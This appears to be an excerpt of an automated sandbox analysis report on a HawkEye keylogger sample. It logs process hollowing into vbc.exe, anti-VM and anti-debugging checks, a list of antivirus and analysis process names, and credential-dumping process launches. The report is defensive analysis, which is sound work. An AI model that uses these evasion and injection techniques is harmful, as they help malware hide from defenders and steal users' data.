Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Section loaded: OutputDebugStringW count: 1982
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Section loaded: OutputDebugStringW count: 1982

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,

2_2_0040978A

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6532	Thread sleep count: 173 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6532	Thread sleep time: -173000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe TID: 6832	Thread sleep time: -31025s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6904	Thread sleep count: 163 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6904	Thread sleep time: -163000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A3781C FindFirstFileExA,	0_2_00A3781C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,	2_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,	2_2_00408CAC
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0015781C FindFirstFileExA,	4_2_0015781C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,	6_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,	6_2_00408CAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_0040702D

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_0041829C memset,GetSystemInfo,

2_2_0041829C

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

Code function: 0_2_00A3511E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00A3511E

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

2_2_0040978A

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_004443B0

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A4D015 mov eax, dword ptr fs:[00000030h]	0_2_00A4D015
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A34450 mov eax, dword ptr fs:[00000030h]	0_2_00A34450
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A4CD05 mov edx, dword ptr fs:[00000030h]	0_2_00A4CD05
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A4AA25 mov eax, dword ptr fs:[00000030h]	0_2_00A4AA25
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A4AA65 mov eax, dword ptr fs:[00000030h]	0_2_00A4AA65
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A4CFB5 mov eax, dword ptr fs:[00000030h]	0_2_00A4CFB5
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0016D015 mov eax, dword ptr fs:[00000030h]	4_2_0016D015
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_00154450 mov eax, dword ptr fs:[00000030h]	4_2_00154450
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0016CD05 mov edx, dword ptr fs:[00000030h]	4_2_0016CD05
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0016AA25 mov eax, dword ptr fs:[00000030h]	4_2_0016AA25
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0016AA65 mov eax, dword ptr fs:[00000030h]	4_2_0016AA65
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0016CFB5 mov eax, dword ptr fs:[00000030h]	4_2_0016CFB5

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

Code function: 0_2_00A38F0E GetProcessHeap,

0_2_00A38F0E

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A318A3 SetUnhandledExceptionFilter,	0_2_00A318A3
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A3511E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A3511E
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A31B72 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00A31B72
Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A31755 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A31755
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_001518A3 SetUnhandledExceptionFilter,	4_2_001518A3
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0015511E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0015511E
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_00151755 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00151755
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_00151B72 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00151B72

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: 1.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 5.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')

Allocates memory in foreign processes

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe protection: execute and read and write			Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp992B.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp92CE.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpDC10.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD611.tmp'	Jump to behavior

Source: RegAsm.exe, 00000001.00000002.603927995.0000000001960000.00000002.00000001.sdmp, RegAsm.exe, 00000005.00000002.603488835.00000000012C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000001.00000002.603927995.0000000001960000.00000002.00000001.sdmp, RegAsm.exe, 00000005.00000002.603488835.00000000012C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000001.00000002.603927995.0000000001960000.00000002.00000001.sdmp, RegAsm.exe, 00000005.00000002.603488835.00000000012C0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: RegAsm.exe, 00000001.00000002.603927995.0000000001960000.00000002.00000001.sdmp, RegAsm.exe, 00000005.00000002.603488835.00000000012C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

Code function: 0_2_00A319BB cpuid

0_2_00A319BB

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe

Code function: 0_2_00A31643 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00A31643

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 13_2_004073B6 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

13_2_004073B6

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_004083A1 GetVersionExW,

2_2_004083A1

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: bdagent.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: MSASCui.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: avguard.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: avgrsx.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: avcenter.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: avp.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: zlclient.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: avgcsrvx.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: avgnt.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: hijackthis.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: avgui.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: avgwdsvc.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: mbam.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: MsMpEng.exe
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	Binary or memory string: ComboFix.exe

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.605834694.0000000002D29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.606017869.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp, type: MEMORY
